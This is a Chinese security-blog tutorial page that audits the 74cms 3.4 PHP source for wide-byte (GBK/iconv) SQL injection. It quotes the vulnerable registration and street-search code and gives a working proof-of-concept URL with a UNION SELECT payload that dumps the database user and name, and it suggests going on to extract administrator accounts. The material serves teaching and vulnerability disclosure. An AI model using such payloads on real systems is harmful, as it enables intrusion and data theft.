<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>





  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  




<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="PHP,SQL注入,代码审计," />





  <link rel="alternate" href="http://www.cnbraid.com/atom.xml" title="Braid's Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="0x01 背景首先我们了解下宽字节注入，宽字节注入源于程序员设置MySQL连接时错误配置为：set character_set_client=gbk，这样配置会引发编码转换从而导致的注入漏洞。具体原理如下：1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时，黑客使用的单引号 ‘ 就会被转义为: \’；2.但如果存在宽字节注入，我们输入%df%27时首先经过上面">
<meta property="og:type" content="article">
<meta property="og:title" content="【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入">
<meta property="og:url" content="http://www.cnbraid.com/2016/02/28/sql4/index.html">
<meta property="og:site_name" content="Braid's Blog">
<meta property="og:description" content="0x01 背景首先我们了解下宽字节注入，宽字节注入源于程序员设置MySQL连接时错误配置为：set character_set_client=gbk，这样配置会引发编码转换从而导致的注入漏洞。具体原理如下：1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时，黑客使用的单引号 ‘ 就会被转义为: \’；2.但如果存在宽字节注入，我们输入%df%27时首先经过上面">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql3_02.png">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql3_03.png">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql4_01.png">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql4_02.png">
<meta property="og:updated_time" content="2016-02-29T01:58:09.795Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入">
<meta name="twitter:description" content="0x01 背景首先我们了解下宽字节注入，宽字节注入源于程序员设置MySQL连接时错误配置为：set character_set_client=gbk，这样配置会引发编码转换从而导致的注入漏洞。具体原理如下：1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时，黑客使用的单引号 ‘ 就会被转义为: \’；2.但如果存在宽字节注入，我们输入%df%27时首先经过上面">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入 | Braid's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Braid's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">攻城狮，黑客，网络安全爱好者</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-th fa-fw"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-tags fa-fw"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-02-28T10:35:00+08:00" content="2016-02-28">
              2016-02-28
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/WEB安全/" itemprop="url" rel="index">
                    <span itemprop="name">WEB安全</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/02/28/sql4/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/02/28/sql4/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          
             <span id="/2016/02/28/sql4/" class="leancloud_visitors" data-flag-title="【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入">
               &nbsp; | &nbsp;
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">阅读次数 </span>
               <span class="leancloud-visitors-count"></span>
              </span>
          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x01_背景">0x01 背景</h2><p>首先我们了解下宽字节注入，宽字节注入源于程序员设置MySQL连接时错误配置为：set character_set_client=gbk，这样配置会引发编码转换从而导致的注入漏洞。具体原理如下：<br>1.正常情况下当GPC开启或使用addslashes函数过滤GET或POST提交的参数时，黑客使用的单引号 ‘ 就会被转义为: \’；<br>2.但如果存在宽字节注入，我们输入%df%27时首先经过上面提到的单引号转义变成了%df%5c%27（%5c是反斜杠\），之后在数据库查询前由于使用了GBK多字节编码，即在汉字编码范围内两个字节会被编码为一个汉字。然后MySQL服务器会对查询语句进行GBK编码即%df%5c转换成了汉字“運”（注：GBK的汉字编码范围见附录），而单引号逃逸了出来，从而造成了注入漏洞。<br>现在基本上都会将mysql的连接配置为“set character_set_client=binary”来解决这个问题，所以这篇文章将介绍出现在php中因为字符编码导致的注入问题。</p>
<p><strong>思路来源于FreeBuf：<a href="http://www.freebuf.com/articles/web/31537.html" target="_blank">http://www.freebuf.com/articles/web/31537.html</a></strong><br><strong>漏洞来源于乌云：<a href="http://www.wooyun.org/bugs/wooyun-2014-063219" target="_blank">http://www.wooyun.org/bugs/wooyun-2014-063219</a></strong><br><a id="more"></a></p>
<h2 id="0x02_环境搭建">0x02 环境搭建</h2><p>看背景我们使用了低版本的74cms程序，版本为3.4（20140310）<br>①源码网上可以搜到，我打包了一份：<a href="http://pan.baidu.com/s/1c1mLCru" title="74cmsV3.4(20140310).zip" target="_blank" rel="external">http://pan.baidu.com/s/1c1mLCru</a><br>②解压到www的74cms(20140310)目录下，浏览器访问<a href="http://localhost/74cms(20140310" target="_blank" rel="external">http://localhost/74cms(20140310)</a>)，然后按照提示一步步安装即可，安装遇到问题请自行百度或谷歌，成功后访问如下图：<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql3_02.png" alt=""></p>
<h2 id="0x03_漏洞分析">0x03 漏洞分析</h2><blockquote>
<p><strong>Part1:源码结构</strong></p>
</blockquote>
<p>源码的结构比较清晰，应该是审计过最清晰的结构了，主要有下面三块内容：</p>
<p><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql3_03.png" alt=""></p>
<p>index.php引入了common.inc.php文件，我们跟进common.inc.php，发现了处理gpc的函数:</p>
<pre><code><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_GET</span>))
{
<span class="variable">$_GET</span>  = addslashes_deep(<span class="variable">$_GET</span>);
}
<span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_POST</span>))
{
<span class="variable">$_POST</span> = addslashes_deep(<span class="variable">$_POST</span>);
}
<span class="variable">$_COOKIE</span>   = addslashes_deep(<span class="variable">$_COOKIE</span>);
<span class="variable">$_REQUEST</span>  = addslashes_deep(<span class="variable">$_REQUEST</span>);
</code></pre><p>可以看到，服务端处理GET和POST请求的变量时都会做addslashes处理。<br>而且74cms为了防止宽字节注入，将MySQL连接设置为二进制读取，配置在/include/mysql.class.php中：</p>
<pre><code><span class="keyword">function</span> connect(<span class="variable">$dbhost</span>, <span class="variable">$dbuser</span>, <span class="variable">$dbpw</span>, <span class="variable">$dbname</span> = <span class="string">''</span>, <span class="variable">$dbcharset</span> = <span class="string">'gbk'</span>, <span class="variable">$connect</span>=<span class="number">1</span>){
    <span class="variable">$func</span> = empty(<span class="variable">$connect</span>) ? <span class="string">'mysql_pconnect'</span> : <span class="string">'mysql_connect'</span>;
    if(!<span class="variable">$this-</span>&gt;linkid = @<span class="variable">$func</span>(<span class="variable">$dbhost</span>, <span class="variable">$dbuser</span>, <span class="variable">$dbpw</span>, true)){
        <span class="variable">$this-</span>&gt;dbshow(<span class="string">'Can not connect to Mysql!'</span>);
    } else {
        if(<span class="variable">$this-</span>&gt;dbversion() &gt; <span class="string">'4.1'</span>){
            mysql_query( <span class="string">"SET NAMES gbk"</span>);
            if(<span class="variable">$this-</span>&gt;dbversion() &gt; <span class="string">'5.0.1'</span>){
                mysql_query(<span class="string">"SET sql_mode = ''"</span>,<span class="variable">$this-</span>&gt;linkid);
                //character_set_client=binary即二进制方式
                mysql_query(<span class="string">"SET character_set_connection="</span>.<span class="variable">$dbcharset</span>.<span class="string">", character_set_results="</span>.<span class="variable">$dbcharset</span>.<span class="string">", character_set_client=binary"</span>, <span class="variable">$this-</span>&gt;linkid);
            }
        }
    }
</code></pre><p>接下来看看php中iconv函数的使用会造成什么样的后果。</p>
<blockquote>
<p><strong>Part2:审计过程</strong></p>
</blockquote>
<p>注入一分析：<br>1.在/plus/ajax_user.php注册处：</p>
<pre><code>elseif (<span class="variable">$act</span>==<span class="string">'do_reg'</span>)
{
<span class="variable">$captcha</span>=get_cache(<span class="string">'captcha'</span>);
if (<span class="variable">$captcha</span>[<span class="string">'verify_userreg'</span>]==<span class="string">"1"</span>)
{
    <span class="variable">$postcaptcha</span>=$_POST[<span class="string">'postcaptcha'</span>];
    if (<span class="variable">$captcha</span>[<span class="string">'captcha_lang'</span>]==<span class="string">"cn"</span> &amp;&amp; strcasecmp(QISHI_DBCHARSET,<span class="string">"utf8"</span>)!=<span class="number">0</span>)
    {
    <span class="variable">$postcaptcha</span>=iconv(<span class="string">"utf-8"</span>,QISHI_DBCHARSET,<span class="variable">$postcaptcha</span>);
    }
    if (empty(<span class="variable">$postcaptcha</span>) || empty($_SESSION[<span class="string">'imageCaptcha_content'</span>]) || strcasecmp($_SESSION[<span class="string">'imageCaptcha_content'</span>],<span class="variable">$postcaptcha</span>)!=<span class="number">0</span>)
    {
    exit(<span class="string">"err"</span>);
    }
}
require_once(QISHI_ROOT_PATH.<span class="string">'include/fun_user.php'</span>);
<span class="variable">$username</span> = isset($_POST[<span class="string">'username'</span>])?trim($_POST[<span class="string">'username'</span>]):exit(<span class="string">"err"</span>);
<span class="variable">$password</span> = isset($_POST[<span class="string">'password'</span>])?trim($_POST[<span class="string">'password'</span>]):exit(<span class="string">"err"</span>);
<span class="variable">$member</span>_type = isset($_POST[<span class="string">'member_type'</span>])?intval($_POST[<span class="string">'member_type'</span>]):exit(<span class="string">"err"</span>);
<span class="variable">$email</span> = isset($_POST[<span class="string">'email'</span>])?trim($_POST[<span class="string">'email'</span>]):exit(<span class="string">"err"</span>);
if (strcasecmp(QISHI_DBCHARSET,<span class="string">"utf8"</span>)!=<span class="number">0</span>)
{
//对注册的名字进行utf-<span class="number">8</span>到GBK的编码转换
<span class="variable">$username</span>=iconv(<span class="string">"utf-8"</span>,QISHI_DBCHARSET,<span class="variable">$username</span>);
<span class="variable">$password</span>=iconv(<span class="string">"utf-8"</span>,QISHI_DBCHARSET,<span class="variable">$password</span>);
}
 <span class="variable">$register</span>=user_register(<span class="variable">$username</span>,<span class="variable">$password</span>,<span class="variable">$member</span>_type,<span class="variable">$email</span>);
</code></pre><p>这里我们思考下“錦”这个字，它的utf-8编码是e98ca6，它的gbk编码是e55c，而上面提到过反斜杠\正好为5c。<br>所以如果我们将username设置为：錦’，首先经过addlashes函数或GPC对单引号转义变为：錦\’，然后这里注册时会经过icnov函数会对”錦”转化为gbk编码，最后就是：％e5％5c％5c％27。反斜杠被转义了（％5c％5c），从而单引号逃逸出来引发注入漏洞。</p>
<p>2.我们继续跟进$register=user_register($username,$password,$member_type,$email);<br>这里的user_register函数，在/include/fun_user.php里：</p>
<pre><code>//检查简历的完成程度
//注册会员
<span class="keyword">function</span> user_register(<span class="variable">$username</span>,<span class="variable">$password</span>,<span class="variable">$member</span>_type=<span class="number">0</span>,<span class="variable">$email</span>,<span class="variable">$uc</span>_reg=<span class="literal">true</span>)
{
global <span class="variable">$db</span>,<span class="variable">$timestamp</span>,$_CFG,<span class="variable">$online</span>_ip,<span class="variable">$QS</span>_pwdhash;
<span class="variable">$member</span>_type=intval(<span class="variable">$member</span>_type);
//这里是用get_user_inusername函数来判断用户名是否已经存在，我们跟进
<span class="variable">$ck</span>_username=get_user_inusername(<span class="variable">$username</span>);
<span class="variable">$ck</span>_email=get_user_inemail(<span class="variable">$email</span>);
... ...
return <span class="variable">$insert</span>_id;
}
</code></pre><p>3.继续跟进get_user_inusername函数，在/include/fun_user.php里：</p>
<pre><code><span class="keyword">function</span> get_user_inusername(<span class="variable">$username</span>)
{
global <span class="variable">$db</span>;
//带入查询，可注入～
<span class="variable">$sql</span> = <span class="string">"select * from "</span>.table(<span class="string">'members'</span>).<span class="string">" where username = '{$username}' LIMIT 1"</span>;
return <span class="variable">$db-</span>&gt;getone(<span class="variable">$sql</span>);
}
</code></pre><p>注入二分析：<br>在plus/ajax_street.php中：</p>
<pre><code>elseif(<span class="variable">$act</span> == <span class="string">'key'</span>)
{
<span class="variable">$key</span>=trim($_GET[<span class="string">'key'</span>]);
if (!empty(<span class="variable">$key</span>))
{
if (strcasecmp(QISHI_DBCHARSET,<span class="string">"utf8"</span>)!=<span class="number">0</span>) 
//对参数key进行utf-<span class="number">8</span>到GBK编码的转换
<span class="variable">$key</span>=iconv(<span class="string">"utf-8"</span>,QISHI_DBCHARSET,<span class="variable">$key</span>);
//带入查询，可以注入
<span class="variable">$result</span> = <span class="variable">$db-</span>&gt;query(<span class="string">"select * from "</span>.table(<span class="string">'category'</span>).<span class="string">" where c_alias='QS_street' AND c_name LIKE '%{$key}%' "</span>);
//将查询结果输出到页面中，可回显
while(<span class="variable">$row</span> = <span class="variable">$db-</span>&gt;fetch_array(<span class="variable">$result</span>))
{
    if (<span class="variable">$listtype</span>==<span class="string">"li"</span>)
    {
    <span class="variable">$htm</span>.=<span class="string">"&lt;li  title=\"</span>{<span class="variable">$row</span>[<span class="string">'c_name'</span>]}\<span class="string">" id=\"</span>{<span class="variable">$row</span>[<span class="string">'c_id'</span>]}\<span class="string">"&gt;{$row['c_name']}&lt;/li&gt;"</span>;
    }
    else
    {
    $_GET[<span class="string">'streetid'</span>]=<span class="variable">$row</span>[<span class="string">'c_id'</span>];
    <span class="variable">$url</span>=url_rewrite(<span class="string">'QS_street'</span>,$_GET);
    <span class="variable">$htm</span>.=<span class="string">"&lt;li&gt;&lt;a href=\"</span>{<span class="variable">$url</span>}\<span class="string">" title=\"</span>{<span class="variable">$row</span>[<span class="string">'c_note'</span>]}\<span class="string">" class=\"</span>vtip\<span class="string">"&gt;{$row['c_name']}&lt;/a&gt;&lt;span&gt;{$row['stat_jobs']}&lt;/span&gt;&lt;/li&gt;"</span>;
    };
}
if (empty(<span class="variable">$htm</span>))
{
<span class="variable">$htm</span>=<span class="string">"&lt;span class=\"</span>noinfo\<span class="string">"&gt;没有找到关键字： &lt;span&gt;{$key}&lt;/span&gt; 相关道路！&lt;/span&gt;"</span>;
}
exit(<span class="variable">$htm</span>);
}
}
</code></pre><p>这里分析发现页面将查询结果回显出来，构造一些union的查询语句即可获取数据库的敏感信息。</p>
<h2 id="0x04_漏洞证明">0x04 漏洞证明</h2><p>我们使用注入二（有回显）的来做证明<br>发现74cms的category表有9个字段，所以构造获取数据库用户和相关信息的POC：</p>
<pre><code>http://localhost/<span class="number">74</span>cms(<span class="number">20140310</span>)/plus/ajax_street.php?act=key&amp;key=<span class="decorator">%E9</span><span class="decorator">%8C</span><span class="decorator">%A6</span><span class="decorator">%27</span><span class="decorator">%20union</span><span class="decorator">%20select</span><span class="decorator">%201</span>,<span class="number">2</span>,<span class="number">3</span>,user(),<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,database(),<span class="number">9</span><span class="decorator">%23</span>
</code></pre><p><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql4_01.png" alt=""><br>查看sql语句发现查询语句里反斜杠被转移，单引号成功逃逸出来：<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql4_02.png" alt=""><br>最后，有兴趣的同学可以继续获取其它的管理员账户等相关字段的信息。</p>
<p>附GBK的汉字编码范围：</p>
<blockquote>
<p><strong>汉字区包括：</strong><br>a. GB 2312 汉字区。即 GBK/2: B0A1-F7FE。收录 GB 2312 汉字 6763 个，按原顺序排列。<br>b. GB 13000.1 扩充汉字区。包括：<br>(1) GBK/3: 8140-A0FE。收录 GB 13000.1 中的 CJK 汉字 6080 个。<br>(2) GBK/4: AA40-FEA0。收录 CJK 汉字和增补的汉字 8160 个。CJK 汉字在前，按 UCS 代码大小排列；增补的汉字（包括部首和构件）在后，按《康熙字典》的页码/字位排列。</p>
</blockquote>
<p>可以看到，GBK编码中的两个字符是一个汉字，第一个字符需要大于128。</p>
<p>本文由HackBraid整理总结，如需转载请联系作者。</p>

      
    </div>

    <div>
      
        
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PHP/" rel="tag">#PHP</a>
          
            <a href="/tags/SQL注入/" rel="tag">#SQL注入</a>
          
            <a href="/tags/代码审计/" rel="tag">#代码审计</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/02/19/sql3/" rel="next" title="【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入">
                <i class="fa fa-chevron-left"></i> 【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/02/28/sql4/"
           data-title="【PHP代码审计实例教程】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入" data-url="http://www.cnbraid.com/2016/02/28/sql4/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/avatar.png"
               alt="Braid" />
          <p class="site-author-name" itemprop="name">Braid</p>
          <p class="site-description motion-element" itemprop="description">web | security | java | jsp | php</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">8</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="http://www.cnbraid.com/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        <div class="links-of-blogroll motion-element">
          
            <div class="links-of-blogroll-title">友情链接</div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://tnt1200.github.io/" target="_blank">Tnt1200</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.iswin.org/" target="_blank">随风</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://bksec.net/" target="_blank">my5t3ry</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://mars.run/" target="_blank">Mars</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.thinkings.org/" target="_blank">从容</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.waitalone.cn/" target="_blank">独自等待</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.hacksb.org/" target="_blank">断笔抚琴</a>
                </li>
              
            </ul>
          
        </div>

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01_背景"><span class="nav-number">1.</span> <span class="nav-text">0x01 背景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02_环境搭建"><span class="nav-number">2.</span> <span class="nav-text">0x02 环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03_漏洞分析"><span class="nav-number">3.</span> <span class="nav-text">0x03 漏洞分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04_漏洞证明"><span class="nav-number">4.</span> <span class="nav-text">0x04 漏洞证明</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Braid信息安全博客 -</span>
</div>

<div class="theme-info">
  <a class="theme-link" href="http://wooyun.org/whitehats/HackBraid">
    HackBraid
  </a> | <a class="theme-link" href="mailto:hackbraid@gmail.com">
    hackbraid@gmail.com
  </a></span>
</div>



      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  


  




<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.min.js"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js"></script>

  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/vendors/jquery-scrollintoview/jquery.scrollintoview.min.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"hackbraid"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
  





  
  
  

  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("4mIc01CuAcxNeBtS9VMXLgeW-gzGzoHsz", "gJXfNgx0s7OHWVgJrY5WVs7Y");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

</body>
</html>
